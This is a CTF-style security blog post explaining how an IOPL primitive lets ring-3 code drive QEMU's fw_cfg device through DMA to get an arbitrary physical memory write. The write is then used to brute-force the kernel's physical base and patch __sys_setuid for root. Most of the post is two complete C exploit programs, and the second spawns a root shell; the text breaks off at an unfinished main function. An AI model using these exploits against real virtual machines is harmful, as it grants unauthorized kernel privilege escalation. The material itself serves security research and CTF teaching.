Intro
In this post, we will talk about exploiting a weird x86-only primitive. We recommend reading this blog post before continuing with this one, to better understand how I/O privilege levels work on x86.
x86 IOPL
I/O ports
There are two ways of interacting with physical devices:
- I/O ports: this is the legacy way of doing it. There are at most 2^16 ports, which are accessed with the in and out instructions and their variants.
- MMIO (Memory Mapped I/O): the more “modern” way of doing it. With this method you read from or write to a specific physical address that is mapped to the target device.
Different types of devices exist but we are interested primarily in hard drives/CD-ROMS and potentially in devices that use DMA transfers.
Internals
The rflags register has a two-bit field called IOPL (I/O Privilege Level). If the CPL (Current Privilege Level) is lower than or equal to the thread’s IOPL, the processor allows the thread to access all I/O ports. The other way to gain access to I/O ports is to modify the IOPB (I/O Permission Bitmap), the per-port bit mask stored in the TSS: a cleared bit grants access to the corresponding port (to better understand this read the article linked in “Intro”).
Keep in mind that the address of the TSS is predictable so the second method could come in handy. For more information on this matter you can read @leave’s article on cpu entry area.
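To make the check concrete, here is a minimal sketch in C that models it for a single-byte port access. It is a simplified model of the rule described above, not how the CPU or the kernel implements it. The names rflags_iopl and port_access_allowed are made up for illustration, and the only layout fact it relies on is that IOPL sits in bits 12-13 of rflags.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define RFLAGS_IOPL_SHIFT 12
#define RFLAGS_IOPL_MASK  (3ull << RFLAGS_IOPL_SHIFT)

/* Extract the two-bit IOPL field (bits 12-13) from an rflags value. */
static unsigned rflags_iopl(uint64_t rflags)
{
    return (unsigned)((rflags & RFLAGS_IOPL_MASK) >> RFLAGS_IOPL_SHIFT);
}

/*
 * Simplified model of the permission check for a 1-byte port access:
 *  - if CPL <= IOPL, every port is accessible;
 *  - otherwise the port is accessible only if its bit in the IOPB is clear.
 * iopb may be NULL, which models a task without a bitmap.
 */
static bool port_access_allowed(unsigned cpl, uint64_t rflags,
                                const uint8_t *iopb, size_t iopb_len,
                                uint16_t port)
{
    if (cpl <= rflags_iopl(rflags))
        return true;
    if (iopb == NULL || (size_t)(port / 8) >= iopb_len)
        return false;
    return (iopb[port / 8] & (1u << (port % 8))) == 0;
}
```

With IOPL set to 3 the first branch always succeeds for ring 3 code, so the bitmap is never consulted.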
Pwning
Primitive
The primitive is simple: we can modify IOPL as we wish. In this case we will set it to 3 so that we can use all I/O ports from ring 3.
Objective
The objective is to read flag.txt, possibly without directly interacting with the device that stores the file itself, to make the exploit as portable as possible. Keep in mind that we are testing exploits on QEMU and not on an actual device.
Environment setup
For context, this is how we were running QEMU locally:
#!/bin/sh
qemu-system-x86_64 \
-m 3.5G \
-no-reboot \
-nographic \
-cpu host \
-smp cores=2 \
-kernel bzImage \
-initrd initramfs.cpio.gz \
-drive file=flag.txt,if=virtio,format=raw,readonly \
-append "console=ttyS0 quiet kaslr=on" \
-monitor tcp:127.0.0.1:4444,server,nowait \
-s
The kernel version is 6.14.0, but the technique does not depend on the kernel version or build (only the hardcoded offsets in the exploits below do), and it also works with KVM enabled.
Exploring different paths
Initially we dumped all the emulated devices from the QEMU monitor with info qtree.
We tried to interact with the emulated PCI device to read the flag directly, but this is not a simple task for various reasons:
- this path is device specific (it depends on what type of storage you are using)
- it’s hard to turn into a privilege escalation
- it could require MMIO interaction
After wasting our time with the first path, we took a second look at the list of emulated devices and this particular device caught @prosti’s attention…
QEMU’s fw-cfg emulated device
Do you see it? In the info qtree listing, the fw_cfg device shows dma_enabled = true, which kind of sticks out, and for this reason I decided to get more information about the device. The best documentation that I found is from OSDev and QEMU’s official docs site. If you have time I’d recommend reading one of the two (both are pretty short reads).
FW CFG stands for Firmware Configuration. The device is used to easily pass files from the host to the guest. As QEMU’s documentation states:
“This hardware interface allows the guest to retrieve various data items (blobs) that can influence how the firmware configures itself, or may contain tables to be installed for the guest OS. Examples include device boot order, ACPI and SMBIOS tables, virtual machine UUID, SMP and NUMA information, kernel/initrd images for direct (Linux) kernel booting, etc.”
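Interacting with the device is quite easy and can be done with PIO or MMIO. We will use three ports with fixed addresses: the selector port, the data port and the 64-bit DMA address port, which is accessed as two 32-bit halves:
#define FW_CFG_PORT_SEL 0x510 // 16-bit port
#define FW_CFG_PORT_DATA 0x511 // 8-bit port
#define BIOS_CFG_DMA_ADDR_HIGH 0x514 // 32-bit port, upper half of the DMA address
#define BIOS_CFG_DMA_ADDR_LOW 0x518 // 32-bit port, lower half of the DMA address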
Each available blob of data or file is associated with a selector. To select the blob, just write the selector’s value to FW_CFG_PORT_SEL. After that you can read the contents of the blob by reading from port FW_CFG_PORT_DATA in a loop.
These are the fixed selectors that are listed in OSDev’s post:
#define FW_CFG_SIGNATURE 0x0000
#define FW_CFG_ID 0x0001
#define FW_CFG_DIR 0x0019
To test if the device is actually present, read 4 bytes from FW_CFG_SIGNATURE. This should return the string “QEMU”.
To gain information about the available additional files we will use the selector FW_CFG_DIR. The first four bytes read will be a 32-bit big-endian number which represents the number of available files. Immediately after the count, there is a sequence of entries of the following struct:
struct FWCfgFile { /* an individual file entry, 64 bytes total */
uint32_t size; /* size of referenced fw_cfg item, big-endian */
uint16_t select; /* selector key of fw_cfg item, big-endian */
uint16_t reserved;
char name[56]; /* fw_cfg item name, NUL-terminated ascii */
};
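As a rough illustration of the layout just described, the sketch below decodes a directory that has already been read byte by byte from FW_CFG_PORT_DATA into a buffer. It avoids any port I/O so it can be tried anywhere. The names fw_cfg_entry and fw_cfg_parse_dir are ours and not part of QEMU or OSDev's code.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define FW_CFG_NAME_LEN  56
#define FW_CFG_ENTRY_LEN 64 /* size of one FWCfgFile entry on the wire */

/* Host-order copy of one directory entry (hypothetical helper type). */
struct fw_cfg_entry {
    uint32_t size;
    uint16_t select;
    char name[FW_CFG_NAME_LEN + 1]; /* always NUL-terminated */
};

static uint32_t load_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

static uint16_t load_be16(const uint8_t *p)
{
    return (uint16_t)(((unsigned)p[0] << 8) | p[1]);
}

/*
 * Decode the raw FW_CFG_DIR blob: a big-endian 32-bit count followed by
 * 64-byte entries. Returns how many entries were written to out, never
 * more than max_entries and never reading past raw_len.
 */
static size_t fw_cfg_parse_dir(const uint8_t *raw, size_t raw_len,
                               struct fw_cfg_entry *out, size_t max_entries)
{
    if (raw_len < 4)
        return 0;

    uint32_t count = load_be32(raw);
    size_t n = 0;

    for (uint32_t i = 0; i < count && n < max_entries; i++) {
        size_t off = 4 + (size_t)i * FW_CFG_ENTRY_LEN;
        if (off + FW_CFG_ENTRY_LEN > raw_len)
            break; /* truncated buffer */

        const uint8_t *e = raw + off;
        out[n].size = load_be32(e);       /* bytes 0-3 */
        out[n].select = load_be16(e + 4); /* bytes 4-5, bytes 6-7 reserved */
        memcpy(out[n].name, e + 8, FW_CFG_NAME_LEN);
        out[n].name[FW_CFG_NAME_LEN] = '\0';
        n++;
    }
    return n;
}
```

Each decoded select value can then be written to FW_CFG_PORT_SEL to read the corresponding file.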
Dumping all the structures reveals that, unfortunately, there is nothing interesting for us, but it raised a question: why is there a gap in OSDev’s fixed selector list? Looking at QEMU’s source code, we found out that there are many other fixed selectors that are not well documented. Here is the complete list:
#define FW_CFG_SIGNATURE 0x00
#define FW_CFG_ID 0x01
#define FW_CFG_UUID 0x02
#define FW_CFG_RAM_SIZE 0x03
#define FW_CFG_NOGRAPHIC 0x04
#define FW_CFG_NB_CPUS 0x05
#define FW_CFG_MACHINE_ID 0x06
#define FW_CFG_KERNEL_ADDR 0x07
#define FW_CFG_KERNEL_SIZE 0x08
#define FW_CFG_KERNEL_CMDLINE 0x09
#define FW_CFG_INITRD_ADDR 0x0a
#define FW_CFG_INITRD_SIZE 0x0b
#define FW_CFG_BOOT_DEVICE 0x0c
#define FW_CFG_NUMA 0x0d
#define FW_CFG_BOOT_MENU 0x0e
#define FW_CFG_MAX_CPUS 0x0f
#define FW_CFG_KERNEL_ENTRY 0x10
#define FW_CFG_KERNEL_DATA 0x11
#define FW_CFG_INITRD_DATA 0x12
#define FW_CFG_CMDLINE_ADDR 0x13
#define FW_CFG_CMDLINE_SIZE 0x14
#define FW_CFG_CMDLINE_DATA 0x15
#define FW_CFG_SETUP_ADDR 0x16
#define FW_CFG_SETUP_SIZE 0x17
#define FW_CFG_SETUP_DATA 0x18
#define FW_CFG_FILE_DIR 0x19
This is more interesting! A lot of kernel pwn challenges in CTFs directly store the flag in initramfs.cpio.gz or rootfs.cpio.gz. Using FW_CFG_INITRD_DATA we can directly dump the contents of these files with ease. All the other selectors should just give us information that we should already know.
Happy? No. There is still one port that we haven’t used: the DMA port (BIOS_CFG_DMA_ADDR_{HIGH,LOW}). PIO is not a fast way of reading large files. For this reason, QEMU offers a way of transferring all the needed data in a single, fast DMA transfer.
This is the structure that we will use for the direct memory transfer:
// fw_cfg DMA commands
typedef enum fw_cfg_ctl_t {
fw_ctl_error = 1,
fw_ctl_read = 2,
fw_ctl_skip = 4,
fw_ctl_select = 8,
fw_ctl_write = 16 // this only works on QEMU version < 2.4
} fw_cfg_ctl_t;
typedef struct FWCfgDmaAccess {
uint32_t control;
uint32_t length;
uint64_t address;
} FWCfgDmaAccess;
To check if DMA transfers are enabled, read from the selector FW_CFG_ID and check if the second bit (bit 1, mask 0x2) is set.
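The presence check and the DMA check can be sketched as two small predicates over the bytes read from FW_CFG_PORT_DATA. This is only an illustration under two assumptions: the four bytes have already been read after selecting FW_CFG_SIGNATURE or FW_CFG_ID, and the FW_CFG_ID value is a little-endian 32-bit bitmap, as described in QEMU's documentation. The function and macro names are ours.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define FW_CFG_ID_TRADITIONAL (1u << 0) /* selector/data interface */
#define FW_CFG_ID_DMA         (1u << 1) /* DMA interface */

/* sig holds the 4 bytes read after selecting FW_CFG_SIGNATURE. */
static bool fw_cfg_signature_ok(const uint8_t sig[4])
{
    return memcmp(sig, "QEMU", 4) == 0;
}

static uint32_t load_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* id holds the 4 bytes read after selecting FW_CFG_ID. */
static bool fw_cfg_dma_supported(const uint8_t id[4])
{
    return (load_le32(id) & FW_CFG_ID_DMA) != 0;
}
```

On a real guest the two arrays would be filled with four inb(FW_CFG_PORT_DATA) calls each, right after the matching outw to FW_CFG_PORT_SEL.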
To set up the DMA transfer we have to store our FWCfgDmaAccess structure at a known physical memory address. All of its fields are big-endian.
- control specifies what command you want to execute and in some cases the selector that you want to use.
- length is used for fw_ctl_read, to specify how many bytes you want to read, and fw_ctl_skip, to specify how many bytes you want to advance the seek position through the file.
- address is only used for fw_ctl_read and contains the destination physical address.
After setting up the structure we just have to write its physical address, in big-endian byte order, to BIOS_CFG_DMA_ADDR_{HIGH,LOW} (the write to the low half triggers the transfer) and that’s it! By changing the seek position of a blob of data (let’s say initrd, because it’s big enough to contain all byte values from 0 to 255) we can write an arbitrary byte to an arbitrary physical address.
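The two descriptors behind that one-byte write can be sketched as follows. To keep the example independent of the host's byte order, the descriptor is encoded into a plain 16-byte buffer instead of a struct. The helper names are ours, and the sketch only builds the descriptors; placing them at a known physical address and writing that address to the DMA port is left out.

```c
#include <stdint.h>

#define FW_CFG_DMA_CTL_READ   0x02u
#define FW_CFG_DMA_CTL_SKIP   0x04u
#define FW_CFG_DMA_CTL_SELECT 0x08u
#define FW_CFG_DMA_DESC_LEN   16

static void store_be32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24);
    p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);
    p[3] = (uint8_t)v;
}

static void store_be64(uint8_t *p, uint64_t v)
{
    store_be32(p, (uint32_t)(v >> 32));
    store_be32(p + 4, (uint32_t)v);
}

/* Layout: control (4 bytes), length (4 bytes), address (8 bytes), all big-endian. */
static void fw_cfg_dma_encode(uint8_t desc[FW_CFG_DMA_DESC_LEN],
                              uint32_t control, uint32_t length,
                              uint64_t address)
{
    store_be32(desc, control);
    store_be32(desc + 4, length);
    store_be64(desc + 8, address);
}

/* Step 1: select a blob and advance its seek position by offset bytes. */
static void fw_cfg_dma_encode_skip(uint8_t desc[FW_CFG_DMA_DESC_LEN],
                                   uint16_t selector, uint32_t offset)
{
    uint32_t control = ((uint32_t)selector << 16) |
                       FW_CFG_DMA_CTL_SELECT | FW_CFG_DMA_CTL_SKIP;
    fw_cfg_dma_encode(desc, control, offset, 0);
}

/* Step 2: copy length bytes from the current position to physical address dst. */
static void fw_cfg_dma_encode_read(uint8_t desc[FW_CFG_DMA_DESC_LEN],
                                   uint32_t length, uint64_t dst)
{
    fw_cfg_dma_encode(desc, FW_CFG_DMA_CTL_READ, length, dst);
}
```

Issuing the skip descriptor with the offset of the wanted byte inside the blob, followed by a read descriptor of length 1, stores that byte at dst.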
At this point we have to find a place to store our FWCfgDmaAccess structure. Turns out that finding a fixed physical address with user controlled data is trivial by using ptregs and SP0 as shown in @leave’s post.
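To see why saved registers can double as a descriptor, the sketch below computes the values that r15 and r14 would need to hold. It assumes that the saved register frame starts with r15 immediately followed by r14 (which is what the ptregs-based exploit later in this post relies on) and that the machine is little-endian, as x86 is. The regs_pair type and regs_for_descriptor are illustrative names, not kernel definitions.

```c
#include <stdint.h>
#include <string.h>

/* Same layout as the FWCfgDmaAccess structure used by the device. */
struct fw_cfg_dma_access {
    uint32_t control;
    uint32_t length;
    uint64_t address;
};

/* Two consecutive 64-bit slots, standing in for the saved r15 and r14. */
struct regs_pair {
    uint64_t r15;
    uint64_t r14;
};

/*
 * Inputs are the descriptor fields already converted to big-endian.
 * On a little-endian machine the low half of r15 is stored first, so it
 * must carry control, and the high half must carry length.
 */
static struct regs_pair regs_for_descriptor(uint32_t control_be,
                                            uint32_t length_be,
                                            uint64_t address_be)
{
    struct regs_pair r;
    r.r15 = ((uint64_t)length_be << 32) | control_be;
    r.r14 = address_be;
    return r;
}
```

Once the CPU pushes these registers on kernel entry, the 16 bytes in memory read back exactly like a FWCfgDmaAccess structure.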
Now with arbitrary physical write we can use the same oracle used to solve the challenge /dev/mem (using kptr_restrict) to find the kernel’s physical address. At that point we can patch __sys_setuid to grant any user root.
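The oracle-driven search can be sketched independently of fw_cfg. The version below takes the write primitive and the oracle as callbacks, so the logic can be exercised against a toy stand-in for the machine. All names are hypothetical, the candidate range is a parameter rather than a known property of the kernel, and the sketch assumes the oracle reads 0 before the search starts.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical callbacks: write one byte to physical memory, query the oracle. */
typedef bool (*phys_write_fn)(void *ctx, uint64_t phys_addr, uint8_t value);
typedef bool (*oracle_fn)(void *ctx);

/*
 * Try every candidate base start + slot * align, from the highest slot
 * down to 0. For each one, write a marker where kptr_restrict would be
 * and ask the oracle whether the value changed. Returns the matching
 * base, or 0 if no candidate matched or a write failed.
 */
static uint64_t find_phys_kbase(uint64_t start, uint64_t align, uint64_t slots,
                                uint64_t marker_off, phys_write_fn write_byte,
                                oracle_fn changed, void *ctx)
{
    for (uint64_t slot = slots; slot-- > 0; ) {
        uint64_t base = start + slot * align;
        if (!write_byte(ctx, base + marker_off, 0xaa))
            return 0;
        if (changed(ctx))
            return base;
    }
    return 0;
}

/* Toy stand-in for the guest: a single byte of "kptr_restrict". */
struct fake_machine {
    uint64_t marker_phys; /* where the marker byte really lives */
    uint8_t marker;       /* its current value */
};

static bool fake_write(void *ctx, uint64_t phys_addr, uint8_t value)
{
    struct fake_machine *m = ctx;
    if (phys_addr == m->marker_phys)
        m->marker = value;
    return true;
}

static bool fake_changed(void *ctx)
{
    const struct fake_machine *m = ctx;
    return m->marker != 0;
}
```

In the real exploit the two callbacks would be the fw_cfg byte write and a read of /proc/sys/kernel/kptr_restrict. Note that every miss still overwrites one byte of guest memory, so a tighter candidate range is safer.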
Here is the exploit written by @prosti (this one doesn’t use ptregs and SP0 because it’s meant to be a small PoC; instead I’m using /proc/self/pagemap, which only exposes PFNs to processes with CAP_SYS_ADMIN):
#include "helpers.h"
#include <sys/io.h>
#include <endian.h>
#include <arpa/inet.h>
#include <string.h>
// PWN CONSTANTS
#define CONFIG_PHYSICAL_START 0x1000000ul
#define CONFIG_PHYSICAL_ALIGN 0x0200000ul
#define KPTR_RESTRICT "/proc/sys/kernel/kptr_restrict"
#define KPTR_RESTRICT_OFFSET 0x1eb93a0ul
#define SETUID_CHECK 0x02b960dul
#define SETUID_PATCH 0x75 // je -> jne
// CFG PORTS
#define FW_CFG_PORT_SEL 0x510
#define FW_CFG_PORT_DATA 0x511
#define BIOS_CFG_DMA_ADDR_HIGH 0x514
#define BIOS_CFG_DMA_ADDR_LOW 0x518
#define FW_CFG_SIGNATURE 0x00
#define FW_CFG_ID 0x01
#define FW_CFG_UUID 0x02
#define FW_CFG_RAM_SIZE 0x03
#define FW_CFG_NOGRAPHIC 0x04
#define FW_CFG_NB_CPUS 0x05
#define FW_CFG_MACHINE_ID 0x06
#define FW_CFG_KERNEL_ADDR 0x07
#define FW_CFG_KERNEL_SIZE 0x08
#define FW_CFG_KERNEL_CMDLINE 0x09
#define FW_CFG_INITRD_ADDR 0x0a
#define FW_CFG_INITRD_SIZE 0x0b
#define FW_CFG_BOOT_DEVICE 0x0c
#define FW_CFG_NUMA 0x0d
#define FW_CFG_BOOT_MENU 0x0e
#define FW_CFG_MAX_CPUS 0x0f
#define FW_CFG_KERNEL_ENTRY 0x10
#define FW_CFG_KERNEL_DATA 0x11
#define FW_CFG_INITRD_DATA 0x12
#define FW_CFG_CMDLINE_ADDR 0x13
#define FW_CFG_CMDLINE_SIZE 0x14
#define FW_CFG_CMDLINE_DATA 0x15
#define FW_CFG_SETUP_ADDR 0x16
#define FW_CFG_SETUP_SIZE 0x17
#define FW_CFG_SETUP_DATA 0x18
#define FW_CFG_FILE_DIR 0x19
// https://wiki.osdev.org/QEMU_fw_cfg
struct FWCfgFile {
uint32_t size; /* size of referenced fw_cfg item, big-endian */
uint16_t select; /* selector key of fw_cfg item, big-endian */
uint16_t reserved;
char name[56]; /* fw_cfg item name, NUL-terminated ascii */
};
// fw_cfg DMA commands
typedef enum fw_cfg_ctl_t {
fw_ctl_error = 1,
fw_ctl_read = 2,
fw_ctl_skip = 4,
fw_ctl_select = 8,
fw_ctl_write = 16
} fw_cfg_ctl_t;
typedef struct FWC_fg_dma_access {
uint32_t control;
uint32_t length;
uint64_t address;
} FWC_fg_dma_access;
uint8_t* initrd_cache = NULL;
uint64_t get_physical_addr(uint64_t virt_addr) {
int page_size = getpagesize();
uint64_t page_offset = virt_addr % page_size;
uint64_t virt_page_index = virt_addr / page_size;
// Open pagemap
int fd = open("/proc/self/pagemap", O_RDONLY);
if (fd == -1) {
perror("open pagemap");
return -1;
}
// Seek to the entry in pagemap
uint64_t entry;
if (lseek(fd, virt_page_index * sizeof(entry), SEEK_SET) == -1) {
perror("lseek pagemap");
close(fd);
return -1;
}
if (read(fd, &entry, sizeof(entry)) != sizeof(entry)) {
perror("read pagemap");
close(fd);
return -1;
}
close(fd);
// Check if page is present
if (!(entry & (1ULL << 63))) {
fprintf(stderr, "Page not present\n");
return -1;
}
// PFN is bits 0-54 (if present)
uint64_t pfn = entry & ((1ULL << 55) - 1);
uint64_t phys_addr = (pfn * page_size) + page_offset;
return phys_addr;
}
//
// returns physical address of a valid cmd struct and initializes it
//
uint64_t default_get_cmd(uint32_t control, uint64_t address, uint32_t length){
FWC_fg_dma_access* cmd = calloc(1, sizeof(FWC_fg_dma_access));
cmd->control = htonl(control);
cmd->address = htobe64(address);
cmd->length = htonl(length);
return get_physical_addr((uint64_t)cmd);
}
uint32_t get_initrd_size(){
uint32_t initrd_size = 0;
outw(FW_CFG_INITRD_SIZE, FW_CFG_PORT_SEL);
for(int i = 0; i < 0x4; ++i)
*((int8_t *)&initrd_size + i) = inb(FW_CFG_PORT_DATA);
return initrd_size;
}
uint8_t* read_initrd(){
uint32_t initrd_size;
uint8_t* initrd_data;
if(initrd_cache != NULL)
return initrd_cache;
initrd_size = get_initrd_size();
initrd_data = calloc(1, initrd_size);
if(initrd_data == NULL)
return NULL;
outw(FW_CFG_INITRD_DATA, FW_CFG_PORT_SEL);
for(int i = 0; i < initrd_size; ++i)
initrd_data[i] = inb(FW_CFG_PORT_DATA);
initrd_cache = initrd_data;
return initrd_data;
}
int arbw(uint64_t phys_addr, uint8_t value, uint64_t (* get_cmd)(uint32_t, uint64_t, uint32_t)){
uint64_t cmd_physaddr;
uint32_t cmd_physaddr_lo;
uint32_t cmd_physaddr_hi;
uint64_t byte_addr;
uint32_t byte_off;
uint32_t initrd_size;
uint8_t* initrd_data;
//
// Find the target byte in initrd
//
initrd_size = get_initrd_size();
initrd_data = read_initrd();
byte_addr = (uint64_t)memmem(initrd_data, initrd_size, &value, sizeof(uint8_t));
if(byte_addr == 0)
return 0;
byte_off = byte_addr - (uint64_t)initrd_data;
//
// Skip
//
if(get_cmd == NULL)
cmd_physaddr = default_get_cmd(fw_ctl_skip | fw_ctl_select | (FW_CFG_INITRD_DATA << 16), 0, byte_off);
else
cmd_physaddr = get_cmd(fw_ctl_skip | fw_ctl_select | (FW_CFG_INITRD_DATA << 16), 0, byte_off);
cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);
outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);
//
// 1 byte DMA transfer
//
if(get_cmd == NULL)
cmd_physaddr = default_get_cmd(fw_ctl_read | (FW_CFG_INITRD_DATA << 16), phys_addr, 1);
else
cmd_physaddr = get_cmd(fw_ctl_read | (FW_CFG_INITRD_DATA << 16), phys_addr, 1);
cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);
outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);
return 1;
}
uint32_t check_kptr_restrict(){
uint32_t r = 0;
FILE* f;
f = fopen(KPTR_RESTRICT, "rb");
if(f == NULL)
return 0;
// %u matches the unsigned destination
if(fscanf(f, "%u", &r) != 1)
r = 0;
fclose(f);
return r;
}
int main(int argc, char** argv)
{
setbuf(stdin, NULL);
setbuf(stdout, NULL);
setbuf(stderr, NULL);
// to gain this you need an actual vuln
ioperm(0, 0xffff, 1);
// phys kaslr bruteforce (using kptr_restrict as oracle)
puts("start of bruteforce");
uint64_t phys_kbase;
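for(phys_kbase = CONFIG_PHYSICAL_START + CONFIG_PHYSICAL_ALIGN * 0x10000; phys_kbase >= CONFIG_PHYSICAL_START; phys_kbase -= CONFIG_PHYSICAL_ALIGN){
if(!arbw(phys_kbase + KPTR_RESTRICT_OFFSET, 0xaa, NULL))
goto err;
// oracle: once kptr_restrict reads back non-zero, the write hit the kernel image
if(check_kptr_restrict() != 0)
break;
}
// the loop ran out of candidates without the oracle firing
if(phys_kbase < CONFIG_PHYSICAL_START)
goto err;
printf("phys kbase @ %#lx\n", (unsigned long)phys_kbase);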
if(!arbw(phys_kbase + SETUID_CHECK, SETUID_PATCH, NULL))
goto err;
puts("pwned");
return 0;
err:
puts("exploit failed");
return 1;
}
Extra pwning
Happy now? Not quite.
Turns out that we can store the string “QEMU” (or any substring of it) at an arbitrary physical address. This can be done by using the selector for the signature (FW_CFG_SIGNATURE).
Wouldn’t it be funny if we could just… pwn the challenge by using that? Fun fact: you obviously can!
‘E’ is 0x45 and ‘M’ is 0x4d. In 64-bit mode these two bytes decode as REX prefixes: 0x45 is rex.RB and 0x4d is rex.WRB. A REX prefix that is not immediately followed by the opcode is ignored, so a run of them effectively behaves like NOP padding. By looking at the source code of __sys_setuid you can notice that we could successfully hijack the syscall by “NOPing” out the call to ns_capable_setid.
[Figure: disassembly of __sys_setuid around the call to ns_capable_setid, before and after patching setuid]
As you can notice, the last rex.RB prefix actually changed test al, al to test r8b, r8b but it’s not a problem. Using gdb you can see that r8b is not 0 at run time so the if condition is passed!
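For readers who want to check the prefix bits by hand, here is a small sketch that decodes a byte as a REX prefix. It only covers the generic REX layout (0100WRXB, valid in 64-bit mode) and is not a disassembler. The rex struct and decode_rex are names we chose for the example.

```c
#include <stdbool.h>
#include <stdint.h>

/* The four flag bits of a REX prefix. */
struct rex {
    bool w; /* 64-bit operand size */
    bool r; /* extends the ModRM reg field */
    bool x; /* extends the SIB index field */
    bool b; /* extends the ModRM r/m, SIB base or opcode reg field */
};

/*
 * In 64-bit mode, bytes 0x40-0x4f are REX prefixes with the layout
 * 0100WRXB. Returns false (and leaves out untouched) for any other byte.
 */
static bool decode_rex(uint8_t byte, struct rex *out)
{
    if ((byte & 0xf0) != 0x40)
        return false;
    out->w = (byte & 0x08) != 0;
    out->r = (byte & 0x04) != 0;
    out->x = (byte & 0x02) != 0;
    out->b = (byte & 0x01) != 0;
    return true;
}
```

Feeding it 0x45 sets R and B, which is what turns test al, al into test r8b, r8b, while 0x4d additionally sets W.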
Here is the final exploit (written by @leave, this one uses ptregs):
#include "helpers.h"
#include <sys/io.h>
#include <endian.h>
#include <sys/syscall.h>
#include <signal.h>
#include <asm/ldt.h>
#define WRITE_LDT 1
#define CONFIG_PHYSICAL_START 0x1000000ul
#define CONFIG_PHYSICAL_ALIGN 0x0200000ul
#define KPTR_RESTRICT "/proc/sys/kernel/kptr_restrict"
#define KPTR_RESTRICT_OFFSET 0x1eb93a0ul
#define SETUID_CHECK 0x02b960dul
// CFG PORTS
#define FW_CFG_PORT_SEL 0x510
#define FW_CFG_PORT_DATA 0x511
#define BIOS_CFG_DMA_ADDR_HIGH 0x514
#define BIOS_CFG_DMA_ADDR_LOW 0x518
#define FW_CFG_SIGNATURE 0x00
#define SIGNATURE "QEMU"
#define SP0_PTREGS_PHYS_ADDR 0xf60cf58 // depends on memory size, I'm running with 256M
// https://wiki.osdev.org/QEMU_fw_cfg
// fw_cfg DMA commands
typedef enum fw_cfg_ctl_t {
fw_ctl_error = 1,
fw_ctl_read = 2,
fw_ctl_skip = 4,
fw_ctl_select = 8,
fw_ctl_write = 16
} fw_cfg_ctl_t;
typedef struct FWCfgDmaAccess {
uint32_t control;
uint32_t length;
uint64_t address;
} FWCfgDmaAccess;
void sigfpe_handler(int sig, siginfo_t *si, void *context) {
ucontext_t *uc = (ucontext_t *)context;
uc->uc_mcontext.gregs[REG_RIP] += 3;
}
uint64_t sp0_get_cmd(uint32_t control, uint64_t address, uint32_t length) {
control = htonl(control);
address = htobe64(address);
length = htonl(length);
asm volatile(
".intel_syntax noprefix\n"
"mov r15d, %1\n"
"shl r15, 32\n"
"mov r14d, %0\n"
"or r15, r14\n"
"mov r14, %2\n"
"mov rax, 0\n"
"div rax\n"
".att_syntax prefix\n"
:
: "r" (control), "r" (length), "r" (address)
: "rax", "r14", "r15"
);
return SP0_PTREGS_PHYS_ADDR;
}
int arbw(uint64_t phys_addr, char* value, int size){
uint64_t cmd_physaddr;
uint32_t cmd_physaddr_lo;
uint32_t cmd_physaddr_hi;
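uint64_t byte_addr;
uint32_t byte_off;
// use one pointer for both the search and the offset: two separate "QEMU" literals are not guaranteed to share an address
const char* sig = SIGNATURE;
byte_addr = (uint64_t)memmem(sig, sizeof(SIGNATURE), value, size);
if(byte_addr == 0)
return 0;
byte_off = byte_addr - (uint64_t)sig;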
//
// Skip
//
cmd_physaddr = sp0_get_cmd(fw_ctl_skip | fw_ctl_select | (FW_CFG_SIGNATURE << 16), 0, byte_off);
cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);
if (cmd_physaddr_hi)
outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);
//
// DMA transfer of size bytes
//
cmd_physaddr = sp0_get_cmd(fw_ctl_read | (FW_CFG_SIGNATURE << 16), phys_addr, size);
cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);
if (cmd_physaddr_hi)
outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);
return 1; // success (0 is returned when the bytes are not found in the signature)
}
uint32_t check_kptr_restrict(){
uint32_t r = 0;
FILE* f;
f = fopen(KPTR_RESTRICT, "rb");
if(f == NULL)
return 0;
// %u matches the unsigned destination
if(fscanf(f, "%u", &r) != 1)
r = 0;
fclose(f);
return r;
}
void fw_cfg() {
uint64_t phys_kbase;
for (phys_kbase = CONFIG_PHYSICAL_START + CONFIG_PHYSICAL_ALIGN * 0x1000; phys_kbase >= CONFIG_PHYSICAL_START; phys_kbase -= CONFIG_PHYSICAL_ALIGN){
arbw(phys_kbase + KPTR_RESTRICT_OFFSET, SIGNATURE, sizeof(SIGNATURE) - 1); // 4 bytes, without the trailing NUL
if(check_kptr_restrict() != 0)
break;
}
printf("phys kbase @ %#lx\n", (unsigned long)phys_kbase);
arbw(phys_kbase + SETUID_CHECK+0, "E", 1);
arbw(phys_kbase + SETUID_CHECK+1, "M", 1);
arbw(phys_kbase + SETUID_CHECK+2, "E", 1);
arbw(phys_kbase + SETUID_CHECK+3, "M", 1);
arbw(phys_kbase + SETUID_CHECK+4, "E", 1);
setuid(0);
system("/bin/sh");
}
int main() {
